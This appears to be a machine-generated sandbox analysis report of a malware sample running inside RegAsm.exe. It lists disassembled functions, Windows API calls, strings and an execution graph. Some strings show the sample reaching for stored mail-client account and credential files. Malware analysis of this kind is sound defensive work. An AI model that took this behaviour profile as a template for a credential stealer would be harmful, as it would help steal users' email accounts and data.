                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                      • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009206
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009218
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                      • API String ID: 2506810119-1068371695
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHandleLibraryModule
                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                      • API String ID: 662261464-1276376045
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseHandleReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3642004256-0
                                                                                                                                                                                                                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                                                        • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                                                                        • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                                                        • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                                                                      • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                      • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                      • String ID: : $Se.
                                                                                                                                                                                                                      • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                                                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                                                                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:5.6%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                      Signature Coverage:1.8%
                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                      Total number of Limit Nodes:54
38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 
38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab free free 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab free free 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab free free 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 
38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab free free 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 
445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab free free 38382->38778 38384 40c788 38779 40b1ab free free 38384->38779 38386 40c790 38780 40b1ab free free 38386->38780 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API 
